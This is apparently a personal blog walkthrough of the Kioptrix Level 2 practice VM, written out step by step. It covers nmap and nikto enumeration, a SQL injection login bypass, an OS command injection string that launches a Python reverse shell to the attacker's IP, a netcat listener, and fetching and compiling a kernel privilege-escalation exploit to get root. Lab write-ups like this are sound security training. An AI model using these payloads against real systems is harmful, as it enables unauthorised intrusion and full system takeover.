Kioptrix Level 2 Walkthrough
I write Kioptrix Level2 walkthrough in English for my English training.
Kioptrix Level1 Walkthrough is previous post
Enumeration
arp-scan
Use arp-scan to look up vulnerable VM. 192.168.174.144 is the Kioptrix Level2 VM.
$ sudo arp-scan 192.168.174.0/24 Interface: eth0, type: EN10MB, MAC: 00:0c:29:14:46:33, IPv4: 192.168.174.132 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.174.1 00:50:56:c0:00:08 VMware, Inc. 192.168.174.2 00:50:56:f8:87:2c VMware, Inc. 192.168.174.145 00:0c:29:d5:8b:05 VMware, Inc. 192.168.174.254 00:50:56:f1:9f:7e VMware, Inc.
Nmap
$ ipaddr=192.168.174.145 $ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) $ nmap -sC -sV -p$ports $ipaddr Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 09:31 EDT Nmap scan report for 192.168.174.145 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 614/udp status |_ 100024 1 617/tcp status 443/tcp open ssl/https? | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2021-09-16T10:22:15+00:00; -3h09m36s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_DES_64_CBC_WITH_MD5 617/tcp open status 1 (RPC #100024) 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) Host script results: |_clock-skew: -3h09m36s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds
Nikto
$ nikto -h $ipaddr - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.174.145 + Target Hostname: 192.168.174.145 + Target Port: 80 + Start Time: 2021-09-16 19:12:01 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.0.52 (CentOS) + Retrieved x-powered-by header: PHP/4.3.9 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + Uncommon header 'tcn' found, with contents: choice + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /manual/images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980 + OSVDB-3233: /icons/README: Apache default file found. + 8725 requests: 1 error(s) and 17 item(s) reported on remote host + End Time: 2021-09-16 19:12:44 (GMT-4) (43 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Web Access and OWASP ZAP scan
I access the Web page on the VM. I tested with OWASP ZAP to look up vulnerabilities.
As a result, SQL Injection may be possible. I input test' OR '1'='1 then bypass the authentication.
After bypass the authentication, site shows ping machine.
But this page contains OS command Injection. So I set reverse shell.
Input below string in the form, and use nc to receive shell.
192.168.174.132;export RHOST="192.168.174.132";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
$ nc -l -p 4242 sh-3.00$ uname -a uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux sh-3.00$ whoami whoami apache
Privileged Escalation
I get the local shell. Then, collect the information of target.
sh-3.00$ cat /proc/version cat /proc/version Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007 sh-3.00# cat /etc/redhat-release cat /etc/redhat-release CentOS release 4.5 (Final)
Linux kernel version is 2.6.9. Use searchsploit to explore pirvilege escalation tool.
Below exploit may be used.
$ searchsploit linux kernel 2.6. CentOS --------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------- --------------------------------- Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / | linux/local/9545.c Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/ | linux_x86/local/9542.c Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esc | linux/local/25444.c Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'M | linux_x86-64/local/45516.c --------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results $ cp /usr/share/exploitdb/exploits/linux/local/9545.c ./ $ python3 -m http.server 80
sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget http://192.168.174.132/9545.c
wget http://192.168.174.132/9545.c
--11:15:40-- http://192.168.174.132/9545.c
=> `9545.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]
100%[====================================>] 9,408 --.--K/s
11:15:40 (1.10 GB/s) - `9545.c' saved [9408/9408]
sh-3.00$ gcc -o privesc 9545.c
gcc -o privesc 9545.c
9545.c:376:28: warning: no newline at end of file
sh-3.00$ ls
ls
9545.c privesc
sh-3.00$ chmod +x privesc
chmod +x privesc
sh-3.00$ ./privesc
./privesc
sh-3.00# whoami
whoami
root
I can get the root.
